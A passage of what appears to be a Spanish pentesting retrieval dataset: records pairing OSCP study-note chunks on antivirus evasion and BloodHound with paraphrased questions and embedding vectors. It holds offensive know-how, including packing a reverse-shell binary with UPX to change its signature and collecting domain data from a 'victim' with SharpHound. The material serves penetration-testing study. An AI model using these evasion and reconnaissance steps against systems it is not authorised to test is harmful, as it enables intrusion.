-0.01903, -0.05116, 0.05854, 0.01521, 0.03549, -0.03373, -0.02183, -0.01963, -0.01389, -0.0166, -0.01601, -0.07356, 0.01427, -0.03433, -0.05961, -0.03972, -0.03716, 0.02981, -0.0103, -0.08047, 0.04502, -0.00865, 0.01392, 0.05015, -0.00854, 0.0629, -0.0238, -0.08746, -0.02458, 0.02967, 0.06913, 0.08817, 0.09007, 0.00459, -0.00462, 0.11772, -0.06037, -0.00019, 0.00546, 0.00931, 0.00574, -0.0737, -0.0351, -0.0275, 0.14046, -0.001, -0.02639, 0.05267, 0.00243, 0.01326, 0.00277, 0.01055, -0.04991, 0.03823, 0.07334, -0.09821, -0.02028, -0.01488, 0.01456, -0.07482, 0.0403, 0.02209, -0.01844, -0.08945, -0.00345, 0.03264, -0.03136, 0.00922, -0.02486]} -{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Otras tools\n- **Shellter** (inyecta en un .exe legΓ­timo), **Veil**, **Nim/C# loaders**.\n- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.\n\n> Nota OSCP: la evasiΓ³n de AV estΓ‘ permitida (no es un escΓ‘ner de vulns prohibido β†’ Reglas de herramientas); rara vez hace falta en el examen, pero alguna mΓ‘quina la pide.\n\nRelacionado: Client-side attacks Β· msfvenom Β· Reverse shell Β· OSCP MOC", "indexar": "quΓ© herramientas sirven para crear loaders personalizados con Nim o C#?", "v": [0.02844, -0.00811, -0.11438, -0.09493, 0.04395, -0.21467, -0.12347, 0.09887, -0.06524, -0.07558, -0.05694, -0.06788, -0.02327, -0.20007, -0.01942, 0.04988, -0.05458, -0.17402, 0.02953, 0.15667, -0.08635, 0.10114, -0.0923, -0.10271, -0.07331, 0.00043, 0.09944, -0.07601, -0.26038, 0.17498, -0.06569, 0.06353, 0.14601, 0.0413, -0.00153, -0.08328, -0.06351, -0.05362, -0.17432, 0.13989, -0.00878, 0.13, -0.08682, 0.12814, 0.04781, -0.01483, -0.0093, -0.08266, 0.09192, -0.01296, -0.00346, -0.03117, -0.10869, -0.07484, -0.05259, -0.1088, 0.11567, -0.05995, -0.04367, -0.06637, -0.12535, 0.05934, 0.00266, 0.02113, 0.03073, -0.06838, -0.11087, -0.08138, -0.01971, -0.01325, -0.07026, -0.03755, 0.03575, -0.01921, 0.09371, 0.03039, -0.01911, 0.05551, 0.04296, -0.00818, 0.0961, -0.03186, -0.08093, -0.1017, 0.04591, 0.03459, 0.10922, 0.0257, 0.0196, -0.04952, 0.01749, -0.02443, -0.03394, -0.00666, 0.0035, 0.05529, 0.11446, -0.08525, -0.04301, 0.02144, 0.08392, -0.03481, -0.0384, 0.03104, -0.02652, -0.00611, 0.03298, -0.05319, -0.02869, 0.01891, 0.11313, 0.0134, -0.05735, 0.04404, 0.0223, -0.03538, -0.03497, -0.07574, -0.03859, 0.00313, 0.06436, 0.01842, -0.04068, 0.00842, 0.03281, 0.02255, 0.00028, 0.05174, -0.03807, -0.04246, -0.02021, -0.10117, -0.00799, 0.00729, 0.03174, -0.0359, 0.05746, -0.07024, -0.00093, 0.00623, 0.03916, -0.02749, -0.00277, -0.04237, 0.03627, 0.00879, -0.03576, 0.00974, -0.01841, -0.04915, 0.0932, 0.01594, 0.04923, 0.02485, -0.1303, -0.08267, -0.02996, -0.00976, -0.06835, 0.05618, 0.01333, -0.02758, 0.00511, -0.02937, 0.00313, -0.01779, 0.00435, 0.06271, 0.01109, 0.04773, -0.03479, 0.01602, 0.07736, -0.03155, 0.03176, -0.03499, 0.03601, -0.00454, 0.01549, -0.02037, -0.05117, -0.00517, 0.01017, 0.04378, -0.00185, -0.12524, 0.03495, -0.03187, 0.0666, 0.08293, -0.06412, 0.03153, 0.01796, -0.09418, 0.03259, 0.04841, 0.04775, -0.05246, -0.00448, 0.01712, 0.0439, -0.04164, -0.01012, -0.05773, 0.02933, 0.03693, -0.03408, -0.03814, 0.00715, 0.02519, 0.01979, -0.01156, 0.0476, -0.04849, -0.02402, 0.00327, -0.00964, 0.00231, 0.03075, 0.01069, 0.01425, -0.0166, 0.00833, -0.01035, 0.03495, 0.07714, 0.00535, 0.00315, 0.01976, 0.02094, 0.02811, -0.03474, -0.04908, -0.00297, 0.00957, -0.02318, 0.05393, -0.02166, -0.05608, 0.01201, 0.00118, 0.04874, -0.01638, 0.01106, 0.01957, -0.05031, 0.05302, -0.01168, -0.09969, -0.0444, 0.02491, 0.02007, 0.02372, -0.02463, 0.01038, -0.02761]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# BloodHound\n\n> Dibuja Active Directory **como un grafo**: nodos = usuarios/grupos/mΓ‘quinas, aristas = relaciones. Le preguntas \"ΒΏcamino mΓ‘s corto de juan a Domain Admins?\" y te lo pinta. La ΓΊnica tool con GUI propia.", "indexar": "que programa puedo usar para dibujar el grafo de Active Directory con interfaz grΓ‘fica", "v": [0.03552, 0.05232, -0.1291, -0.19686, 0.1149, -0.04667, -0.0209, 0.01592, -0.02006, -0.00323, 0.12596, -0.12177, -0.20931, -0.08984, 0.01092, -0.04042, 0.05714, -0.10215, -0.06622, -0.04707, 0.04339, 0.12808, -0.03532, -0.07381, -0.04965, -0.06874, 0.00931, -0.07645, -0.03731, 0.01961, 0.0121, 0.00842, 0.13607, -0.15854, -0.11143, -0.14372, 0.04041, -0.0473, 0.10467, 0.01219, -0.0174, 0.05275, -0.14633, 0.06706, 0.04889, 0.01031, 0.0101, -0.04736, -0.08772, 0.04729, 0.0182, -0.0684, -0.02369, 0.08185, 0.02216, -0.10061, 0.07181, -0.16737, -0.01456, -0.01308, 0.0742, 0.04502, -0.04003, -0.07984, -0.00421, -0.03113, 0.02945, -0.06041, -0.02835, 0.05395, 0.06791, 0.1122, -0.01132, 0.01301, 0.12605, 0.01211, -0.10158, -0.09544, 0.1345, 0.00543, -0.01718, 0.00771, -0.00683, 0.03976, -0.11368, -0.07274, -0.03478, -0.05273, -0.0587, -0.04497, 0.01105, 0.01788, -0.03379, 0.02125, 0.05726, 0.03805, 0.0101, 0.05224, 0.10303, -0.05455, 0.02988, -0.05366, -0.13931, 0.0125, -0.00526, -0.00049, -0.0076, 0.057, -0.1265, 0.11565, 0.06757, 0.01212, 0.02695, 0.01658, -0.05396, 0.03274, 0.02621, -0.0139, 0.02468, -0.11868, -0.04079, -0.00543, 0.07409, 0.05913, 0.03323, -0.01784, -0.04097, 0.13742, -0.03996, 0.07262, -0.09208, 0.01731, -0.0503, -0.14541, -0.13759, -0.0044, -0.05675, -0.03794, 0.07824, -0.01998, 0.01123, 0.05033, 0.06413, -0.01918, -0.03486, 0.05799, 0.03837, -0.05718, -0.09384, 0.03451, 0.00259, -0.00679, 0.08007, 0.02934, 0.02605, 0.01304, 0.01833, 0.00685, -0.02644, -0.01625, -0.05842, 0.02698, 0.04508, 0.06602, -0.00208, -0.07772, -0.13587, 0.0183, 0.02528, 0.12276, -0.01074, 0.07276, 0.02752, -0.05681, 0.06292, -0.01023, -0.05945, -0.02447, -0.0399, -0.00707, -0.00156, 0.0371, 0.04741, 0.02108, -0.05857, -0.02899, 0.03138, 0.04578, 0.06223, -0.02792, -0.0674, 0.07211, -0.0117, 0.06738, 0.00943, -0.05571, 0.07224, 0.06936, -0.03326, -0.05643, 0.05185, 0.03882, -0.01275, -0.01394, 0.08058, 0.10801, -0.0458, 0.08793, 0.05833, 0.05099, -0.02947, 0.00251, 0.04286, 0.01109, 0.00907, 0.02227, 0.01225, -0.01976, 0.07236, -0.01255, -0.01185, 0.04722, -0.01107, 0.01452, 0.02902, -0.03412, -0.00055, 0.01074, 0.00451, 0.03027, 0.01952, 0.0563, -0.00048, -0.01651, -0.00649, 0.01506, -0.00625, -0.04709, -0.02276, -0.09851, 0.04214, 0.07766, -0.03247, 0.01699, -0.00125, -0.05002, -0.04213, -0.04116, 0.03279, -0.0376, -0.00128, 0.04638, 0.09837, -0.00446, 0.00667, 0.03702]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# BloodHound\n\n> Dibuja Active Directory **como un grafo**: nodos = usuarios/grupos/mΓ‘quinas, aristas = relaciones. Le preguntas \"ΒΏcamino mΓ‘s corto de juan a Domain Admins?\" y te lo pinta. La ΓΊnica tool con GUI propia.", "indexar": "existe alguna herramienta que me permita visualizar las relaciones entre usuarios, grupos y mΓ‘quinas en dominio como un mapa interactivo?", "v": [-0.01808, 0.12715, -0.12925, -0.23432, -0.15684, -0.07356, -0.06056, 0.01925, -0.15312, -0.1371, 0.02985, -0.08582, 0.07862, -0.06328, 0.12456, 0.02988, 0.20245, 0.00941, -0.00516, -0.07996, -0.03011, -0.04919, -0.07543, 0.02274, -0.09644, -0.01786, -0.01207, -0.12104, -0.10027, 0.13907, 0.03411, 0.00204, 0.00217, -0.06674, -0.10296, -0.17949, 0.03661, 0.05117, 0.10842, 0.01156, -0.0491, -0.06801, -0.13752, -0.01814, 0.053, 0.04299, -0.16052, -0.02638, -0.00477, 0.05135, -0.08687, -0.0885, -0.11737, -0.00422, -0.00782, -0.16768, 0.2076, -0.06688, 0.0809, -0.09353, -0.13651, -0.01021, -0.04746, 0.01557, -0.04923, 0.01953, 0.07493, 0.00143, -0.06806, 0.11587, -0.01271, -0.02251, 0.01398, -0.01367, 0.05899, -0.01197, 0.08208, 0.05337, -0.04534, -0.02707, 0.06925, 0.02365, -0.04636, -0.06934, -0.06757, -0.0498, 0.04363, -0.05404, 0.03563, -0.01996, 0.04306, 0.11886, -0.01541, -0.06099, 0.04348, -0.03359, -0.03394, -0.0273, 0.01293, -0.03082, 0.16456, 0.09446, -0.11214, 0.05681, -0.00881, 0.06241, 0.02183, -0.04952, 0.03963, 0.03549, 0.0776, 0.00471, 0.00833, -0.03695, -0.01628, 0.04383, -0.04953, 0.00811, -0.0013, -0.13767, -0.04716, 0.01588, 0.0141, -0.03464, -0.01423, 0.00054, 0.03082, 0.05016, -0.06714, -0.07864, 0.00101, -0.00979, -0.05542, -0.01599, 0.01845, -0.00384, 0.03897, -0.02065, -0.00825, -0.05512, 0.02374, 0.08348, -0.08189, -0.13857, -0.02051, 0.02031, 0.0269, -0.08944, -0.01998, 0.03375, -0.04268, -0.03673, -0.06778, 0.05702, 0.03238, 0.03968, -0.0892, 0.01801, -0.06375, -0.03554, -0.04441, -0.03538, 0.02551, -0.00106, 0.01031, 0.01887, -0.03335, 0.01269, 0.04034, 0.03757, 0.01359, 0.00939, 0.07798, 0.01921, 0.019, 0.00267, -0.00794, 0.02189, -0.0121, -0.01902, 0.02628, -0.07899, 0.0259, -0.01117, -0.03735, 0.00728, -0.04335, -0.00169, -0.00173, 0.01964, 0.01602, 0.06534, -0.0179, -0.03449, 0.08184, -0.02179, 0.00698, 0.03901, 0.01867, -0.02537, -0.00459, -0.06882, 0.01797, 0.01461, -0.04624, 0.06043, -0.0048, -0.05764, 0.04441, -0.03635, 0.03105, 0.02897, -0.02863, -0.05689, -0.028, -0.02277, -0.02476, 0.01808, -0.00672, -0.03767, -0.0128, 0.00903, 0.04321, -0.04882, 0.06908, 0.00954, 0.01781, 0.00482, 0.02938, -0.02442, 0.00876, -0.04409, 0.03631, -0.02371, 0.05974, -0.03994, 0.07806, -0.0864, -0.02156, -0.00925, 0.00601, 0.00862, 0.0603, -0.03331, -0.10244, -0.0491, -0.00959, -0.03316, -0.07916, -0.04773, -0.00791, 0.00208, 0.04904, 0.0044, 0.00842, 0.0395]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# BloodHound\n\n> Dibuja Active Directory **como un grafo**: nodos = usuarios/grupos/mΓ‘quinas, aristas = relaciones. Le preguntas \"ΒΏcamino mΓ‘s corto de juan a Domain Admins?\" y te lo pinta. La ΓΊnica tool con GUI propia.", "indexar": "cual es la mejor opcion libre para representar Active Directory visualmente conectando nodos y aristas?", "v": [0.07746, 0.08308, -0.20434, -0.0406, 0.08306, -0.04741, -0.01957, -0.08865, -0.1743, -0.02257, 0.08897, -0.26106, -0.1423, 0.01033, 0.17131, -0.02691, 0.12079, -0.00318, 0.01814, 0.03514, 0.02021, -0.00296, -0.12712, -0.01816, 0.08055, 0.00353, 0.01658, -0.01161, -0.0004, 0.02335, 0.03419, -0.00946, 0.03017, -0.0428, 0.09997, -0.10782, -0.05803, 0.11127, 0.11439, 0.05018, -0.11958, 0.12729, -0.01929, 0.08212, 0.06318, 0.08086, -0.05559, -0.04184, -0.03795, 0.11034, -0.04242, 0.02894, -0.0389, -0.02406, 0.08928, -0.04136, 0.03708, -0.0927, 0.06429, -0.04932, -0.00122, 0.00291, -0.02872, -0.10664, -0.05701, -0.02518, 0.02226, -0.0368, -0.09135, 0.03019, -9e-05, -0.01558, 0.0439, 0.11462, 0.03755, 0.09573, 0.01337, -0.10428, 0.03394, 0.12996, 0.13177, -0.0683, -0.0082, 0.10556, -0.08568, -0.12421, 0.01212, -0.04075, 0.02369, -0.04526, 0.10438, -0.00146, -0.06933, 0.04722, -0.00406, -8e-05, -0.00441, 0.06509, 0.08184, 0.06784, 0.02934, 0.0452, -0.06058, 0.09392, 0.04276, -0.03347, 0.01959, 0.08149, -0.11109, 0.04835, -0.04006, -0.0567, 0.00301, -0.01158, 0.02343, -0.01894, -0.08559, -0.10175, 0.02887, 0.01046, -0.00305, -0.06927, 0.02228, -0.00634, 0.02216, 0.02792, 0.05604, 0.07711, -0.07516, 0.12506, -0.02939, 0.02457, -0.0085, -0.16755, -0.0907, -0.09978, 0.0418, -0.04886, 0.07642, -0.05851, -0.00957, -0.01557, 0.05577, -0.01794, -0.00635, 0.0087, 0.05823, 0.06465, 0.0208, 0.07979, -0.02888, 0.03309, 0.03025, 0.02177, 0.06713, 0.10345, -0.01375, -0.02896, -0.02402, 0.05486, -0.05628, 0.01611, -0.02548, 0.03966, 0.01129, -0.04371, -0.12135, -0.00692, 0.02926, 0.00838, 0.00935, 0.07895, -0.01818, -0.11254, -0.05745, -0.03157, 0.02065, -0.03859, 0.04714, -0.01724, -0.00481, 0.01954, -0.06804, -0.04248, 0.03211, -0.02831, -0.02213, -0.06566, 0.05984, -0.00831, 0.00845, 0.0237, 0.00229, -0.02386, 0.03906, -0.0609, -0.00992, -0.06826, -0.04502, 0.00259, 0.02755, -0.0119, 0.02662, 0.00178, 0.02162, 0.08568, -0.06322, 0.07164, 0.02253, 0.04142, -0.02019, -0.0773, 0.14721, -0.01463, -0.0574, 0.02218, 0.02293, -0.05199, -0.03276, -0.01032, -0.0017, 0.01625, -0.00813, -0.00331, 0.01886, 0.02945, 0.00597, 0.0145, -0.03036, -0.00818, -0.04549, 0.00187, -0.04486, -0.00528, -0.01078, 0.03196, 0.04658, -0.01809, -0.03558, -0.04338, 0.06532, 0.09364, -0.01672, -0.02052, -0.03823, -0.01512, -0.10832, 0.05328, -0.00427, -0.06968, -0.04613, 0.0391, 0.04312, -0.00638, 0.00515, -0.02178]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Componentes\n```\nSharpHound (.exe en vΓ­ctima) o bloodhound-python (en Kali) β†’ JSON\nJSON β†’ BloodHound GUI (en Kali) + Neo4j (la BD del grafo)\n```", "indexar": "quΓ© herramienta es mejor para analizar conexiones entre usuarios en una vΓ­ctima", "v": [-0.0253, 0.15815, -0.08206, -0.17768, -0.05127, -0.10896, -0.14575, -0.03309, -0.0354, -0.05373, 0.03685, -0.08876, -0.04117, 0.0329, 0.1026, -0.05889, 0.08898, -0.02449, 0.10177, -0.00893, 0.02803, -0.02536, -0.0756, -0.02646, -0.13219, 0.01671, 0.02567, -0.02551, -0.03784, 0.07939, -0.06066, -0.07535, -0.03744, 0.02486, -0.03711, -0.00763, -0.03015, 0.0663, 0.09943, 0.07655, 0.05993, 0.0064, -0.10562, -0.04006, 0.0957, 0.01392, -0.14463, -0.03499, 0.04838, 0.08093, -0.04109, -0.08755, -0.13435, -0.10669, -0.01065, -0.10245, 0.14617, -0.13046, 0.17109, -0.09291, -0.07458, -0.01073, -0.01935, 0.04772, -0.00843, -0.08835, 0.0906, -0.039, -0.07961, 0.10907, 0.02291, -0.00288, -0.02057, -0.01186, 0.04644, 0.02914, 0.10531, 0.0637, 0.001, 0.01674, 0.09634, -0.02078, -0.13651, 0.03164, -0.12418, 0.05992, 0.08605, -0.01472, 0.04331, -0.05591, 0.07626, -0.00492, 0.0307, 0.00725, 0.02356, -0.06706, 0.09343, -0.17437, -0.00145, -0.02563, 0.18575, -0.05869, -0.05277, 0.09558, -0.00592, -0.05162, -0.07178, 0.0119, -0.124, -0.05634, 0.02724, 0.05801, 0.0693, -0.02607, -0.05987, -0.04802, -0.0649, -0.08601, -0.04847, -0.06028, 0.08001, 0.05972, -0.01025, -0.10483, -0.02336, 0.04066, 0.01974, 0.01036, -0.01625, -0.06231, 0.02816, -0.02255, -0.07934, -0.01695, -0.00426, 0.01274, 0.10139, -0.14805, -0.0211, -0.02748, 0.00642, 0.00489, -0.12847, -0.04908, -0.02669, -0.03234, 0.01047, 0.01339, -0.06482, 0.0291, 0.06455, -0.06779, -0.05408, -0.04516, -0.05696, 0.03274, -0.09279, -0.02633, -0.05946, 0.03276, 0.0058, -0.09251, 0.04338, -0.02117, 0.03907, -0.09194, 0.03284, 0.01304, 0.11897, 0.02527, 0.06237, 0.00996, 0.02106, -0.0005, -0.03364, -0.12039, 0.01493, -0.03842, -0.05721, -0.04315, -0.01945, -0.07207, -0.02709, -0.06503, 0.00376, -0.00344, -0.02124, 0.01568, -0.00308, 0.07212, -0.0233, 0.05393, 0.06019, 0.01726, 0.08121, -0.05154, 0.00681, -0.00787, -0.01014, 0.00641, -0.08555, 0.0057, 0.01173, -0.00991, 0.01521, 0.06216, -0.02453, -0.07385, 0.03557, -0.00619, 0.04632, 0.01252, -0.00815, -0.09281, 0.03031, -0.03005, 0.01718, 0.01332, 0.02622, 0.01641, -0.03928, -0.02067, 0.00243, -0.03645, 0.00591, 0.05146, -0.05419, 0.01853, -0.03955, -0.0402, 0.00823, -0.0407, -0.00244, -0.02074, 0.0002, -0.06895, 0.00203, -0.01531, -0.04779, -0.00667, -0.02842, 0.05078, -0.0276, 0.01585, -0.01683, 0.01823, -0.0375, -0.01885, -0.06422, -0.08814, -0.00568, 0.0143, 0.09992, -0.05326, 0.00581, -0.04181]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Componentes\n```\nSharpHound (.exe en vΓ­ctima) o bloodhound-python (en Kali) β†’ JSON\nJSON β†’ BloodHound GUI (en Kali) + Neo4j (la BD del grafo)\n```", "indexar": "con quΓ© puedo convertir los datos de un anΓ‘lisis de credenciales a un formato JSON visualizable", "v": [-0.15898, 0.00012, -0.1571, -0.04895, 0.04307, -0.09007, -0.01309, -0.05856, 0.00878, -0.15547, 0.07006, -0.21401, -0.1111, 0.02895, 0.08602, 0.09817, 0.15639, -0.1031, -0.01915, -0.0066, 0.00565, -0.19633, -0.0876, -0.19751, -0.00531, 0.13793, -0.04939, 0.03728, -0.03395, 0.04441, 0.00017, -0.05834, -0.02144, 0.04082, -0.05648, 0.05065, -0.04696, 0.21684, -0.08959, 0.09941, 0.02621, 0.0417, -0.0235, 0.09747, 0.00101, 0.03812, -0.12152, 0.13808, -0.12718, -0.05611, -0.00025, 0.05657, -0.15, 0.05806, 0.04229, -0.12152, 0.04689, -0.10978, 0.09869, -0.00761, -0.05364, 0.05912, 0.0686, -0.08392, 0.05881, 0.01034, 0.01574, -0.02032, -0.09226, 0.02935, 0.00237, -0.01424, -0.0143, -0.06063, -0.00281, -0.05417, -0.01235, 0.02911, 0.03829, -0.01411, 0.07119, -0.0311, -0.05165, 0.06222, -0.01779, 0.11409, -0.05754, -0.00568, -0.08108, -0.02718, 0.06472, -0.02126, 0.06968, 0.03698, -0.00656, 0.06524, -0.02892, -0.06566, -0.07813, 0.01168, -0.03169, 0.05056, -0.12953, 0.08359, 0.0433, 0.05747, 0.04351, -0.01718, -0.10309, -0.04482, 0.00906, 0.09359, -0.06311, 0.03231, -0.0368, -0.05364, -0.01223, -0.0582, -0.03956, -0.0019, 0.07571, -0.06727, 0.02567, 0.00116, -0.02216, -0.01711, -0.02219, 0.06887, -0.02963, 0.05268, -0.04661, 0.01779, -0.06862, -0.03836, 0.0553, 0.04495, -0.02032, -0.04902, -0.03589, -0.02834, -0.04106, 0.04092, 0.02446, 0.05626, 0.01972, -0.0854, 0.01446, -0.01012, -0.08528, -0.03768, 0.02908, 0.05512, 0.02778, 0.03743, -0.03712, 0.02868, 0.04551, -0.05609, -0.06177, 0.01792, -0.02985, 0.06388, 0.07033, 0.03444, 0.00959, -0.0534, 0.00362, -0.02614, 0.08163, 0.05291, -0.058, -0.03467, -0.01305, -0.05993, 0.0893, -0.0113, -0.06698, -0.08546, -0.05323, -0.06578, 0.02063, -0.00115, -0.01392, -0.02701, 0.01292, -0.01462, 0.02139, -0.06495, -0.0126, -0.08875, 0.01853, 0.10902, 0.05258, -0.03676, 0.08552, -0.0652, -0.00387, 0.04522, -0.03771, -0.00673, -0.0724, -0.02508, -0.01898, 0.00667, -0.01054, 0.07117, -0.02724, 0.04769, -0.01564, -0.00082, -0.01808, -0.04238, 0.04187, -0.10195, -0.03297, -0.03118, 0.02251, 0.00462, -0.01866, -0.01234, 0.00365, 0.02675, 0.01429, -0.0398, -0.04112, -0.03226, 0.01481, -0.01038, -0.02815, 0.0131, 0.00837, 0.06927, -0.03261, 0.01209, -0.01696, -0.00305, -0.05564, -0.00613, -0.0412, -0.02131, 0.02767, 0.05778, -0.05925, -0.02333, -0.01256, 0.00187, -0.12504, 0.09263, 0.04861, -0.09166, -0.0313, 0.05377, 0.07463, -0.01373, 0.0172, -0.04769]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## InstalaciΓ³n (Debian)\n```bash\nsudo apt install -y bloodhound bloodhound.py neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "quΓ© programa puedo usar para mapear los permisos de dominio y encontrar usuarios con privilegios elevados?", "v": [0.12587, 0.079, -0.09714, -0.19664, -0.0201, -0.03264, 0.08391, -0.13395, -0.22644, -0.11176, 0.02732, -0.0592, 0.06321, -0.12861, -0.06025, -0.09578, 0.17191, 0.02996, 0.02389, -0.03436, 0.04513, -0.05426, -0.11529, -0.02639, -0.0967, -0.02402, 0.06298, -0.13206, -0.11755, 0.04793, 0.02437, 0.02027, -0.02757, -0.06707, -0.0164, -0.0864, 0.07707, 0.06162, 0.03863, 0.01375, 0.10126, -0.04123, -0.14408, 0.02292, -0.02174, -0.01376, -0.08722, -0.00306, -0.00737, -0.11673, 0.0041, -0.09722, -0.0771, -0.07355, 0.06636, -0.02251, 0.0678, -0.08359, -0.04835, 0.00159, -0.13794, -0.06471, 0.03239, 0.04571, -0.02127, -0.08241, 0.12889, 0.06882, -0.04662, 0.10215, -0.03513, 0.03729, 0.0911, 0.0359, 0.1067, -8e-05, -0.07553, -0.13981, 0.04783, -0.03772, 0.03248, 0.03911, -0.09935, -0.05651, -0.09992, -0.08343, -0.05587, -0.05684, 0.0199, -0.00686, 0.09176, 0.10883, 0.00289, -0.0334, 0.04203, -0.09397, 0.01632, 0.04328, -0.05997, 0.01794, 0.10093, 0.084, -0.02997, 0.15887, 0.05422, 0.07209, 0.07147, -0.10669, -0.05073, 0.05039, 0.00627, -0.04569, -0.06767, -0.00309, -0.0514, 0.07331, -0.02858, -0.06132, -0.00547, -0.12605, -0.04319, -0.01626, 0.04388, -0.00245, 0.12555, 0.01854, -0.00461, 0.11841, -0.06314, -0.05846, -0.0053, -0.03247, 0.02271, 0.00353, -0.07693, 0.03102, 0.02184, 0.01103, -0.06853, 0.02654, -0.00863, 0.01283, -0.06034, -0.00454, 0.00662, -0.01686, 0.01223, -0.04896, -0.04994, -0.08961, -0.03765, -0.01018, -0.06342, 0.042, -0.00971, 0.04756, -0.05708, -0.04927, -0.07598, 0.02652, -0.05025, -0.00111, -0.07206, 0.03402, 0.1168, -0.02299, 0.04538, -0.02176, 0.00026, 0.05708, -0.02265, 0.05381, 0.04722, -0.09972, 0.01412, 0.00025, 0.01671, -0.00958, -0.0264, 0.02105, -0.08076, -0.04441, 0.06345, 0.05052, -0.04974, 0.03638, 0.00835, 0.0426, 0.0356, 0.03651, -0.0562, 0.14907, 0.05339, 0.01008, 0.00165, -0.04903, 0.05376, 0.02925, -0.06025, -0.04278, -0.00178, -0.01026, -0.00477, -0.006, 0.01787, -0.031, 0.03515, -0.02211, 0.06235, 0.03168, -0.03712, -0.05891, 0.03905, -0.02291, -0.03087, 0.01931, 0.00811, 0.0396, 0.00225, -0.0858, -0.00119, 0.00607, 0.02006, 0.05356, 0.0894, -0.03805, 0.0263, -0.02403, 0.01397, 0.0542, 0.01182, -0.02337, -0.0078, -0.02297, -0.00058, -0.02871, 0.02212, 0.00486, 0.02069, -0.0233, -0.05803, 0.08645, 0.04546, -0.01439, -0.06076, -0.0122, -0.03197, -0.02592, -0.04283, -0.0044, 0.03091, -0.0069, 0.03578, -0.02915, 0.0239, 0.04822]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## InstalaciΓ³n (Debian)\n```bash\nsudo apt install -y bloodhound bloodhound.py neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "con quΓ© herramienta puedo analizar la actividad del administrador de dominios en Windows?", "v": [0.04873, 0.12972, -0.02144, -0.19818, 0.00509, -0.02288, 0.0236, -0.0659, -0.19052, -0.02961, 0.00968, -0.12416, -0.0673, -0.11572, 0.05098, -0.02883, 0.15036, -0.15052, -0.04847, 0.07188, -0.00386, -0.09074, -0.04372, 0.11285, -0.01699, -0.04295, 0.0377, -0.08958, -0.09587, 0.08631, -0.01465, -0.00315, 0.01982, -0.09061, 0.00108, -0.04284, -0.09368, 0.08177, 0.07938, 0.09727, -0.04852, 0.04169, -0.13019, 0.02948, 0.00567, 0.00469, -0.0861, -0.15904, 0.06955, -0.04553, -0.04421, -0.10534, -0.05902, -0.07755, 0.14521, -0.04391, 0.18376, -0.11977, 0.08264, -0.10986, -0.06312, 0.10378, -0.05427, 0.00851, -0.00775, -0.03327, 0.10247, -0.02241, 0.02178, 0.15415, -0.02453, 0.03874, -0.03656, 0.04948, 0.0702, 0.05441, 0.03797, 0.05329, 0.06227, -0.02374, 0.10183, 0.03473, -0.08336, 0.01453, -0.10812, -0.2204, -0.1006, -0.10783, 0.02236, -0.06303, 0.01872, 0.01201, -0.06838, 0.00379, -0.02999, -0.02201, 0.1, -0.01261, -0.03669, 0.07105, 0.08754, 0.04378, -0.13144, 0.10883, 0.06169, 0.12201, -0.04647, -0.06733, -0.05453, -0.01757, 0.0036, -0.01975, -0.04863, -0.05674, -0.06147, 0.08843, -0.10936, -0.08381, -0.03369, -0.02152, -0.0389, -0.0098, -0.03412, -0.00526, -0.00135, -0.04039, 0.00509, 0.07379, -0.04517, -0.04852, 0.03846, -0.00178, -0.09284, -0.03208, -0.12313, 0.06488, -0.0302, -0.05025, -0.00915, -0.064, 0.00059, 0.05884, 0.02165, -0.01821, 0.09012, 0.00638, 0.02498, -0.03156, -0.07222, -0.03642, 0.04342, -0.04818, -0.02752, 0.07656, -0.01347, 0.03466, -0.00448, 0.02441, -0.03032, 0.02582, -0.02058, -0.03858, -0.02407, 0.01179, 0.03597, -0.03721, 0.00919, -0.02693, 0.06246, 0.03074, -0.08042, 0.0339, -0.02541, -0.02207, 0.02473, -0.01077, -0.02718, -0.00824, -0.00925, -0.07818, -0.03679, 0.00726, 0.00038, 0.00617, -0.08191, 0.02488, -0.01059, 0.02134, -0.05037, 0.03916, 0.03211, 0.04025, 0.02236, -0.0366, 0.04508, -0.00465, -0.00394, -0.03049, 0.02112, -0.02167, -0.03713, -0.03856, -0.02473, -0.04508, 0.05744, 0.0595, -0.05514, 0.06481, 0.04065, 0.02186, -0.01058, -0.02462, 0.05067, -0.04202, -0.03451, -0.04655, 0.03394, 0.01601, -0.01633, -0.05409, 0.02186, 0.04466, 0.06948, -0.06502, 0.01835, -0.00594, 0.01013, 0.02003, 0.03548, 0.04071, -0.03253, 0.01924, 0.00233, 0.00215, 0.03738, -0.00165, 0.07773, -0.06164, -0.0251, 0.01131, -0.03138, 0.0471, 0.00198, -0.03587, -0.0878, -0.06547, -0.03129, 0.02278, -0.03692, -0.08885, 0.0094, 0.00563, 0.03606, -0.04459, -0.00404, -0.01579]} -{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## InstalaciΓ³n (Debian)\n```bash\nsudo apt install -y bloodhound bloodhound.py neo4j\nsudo systemctl start 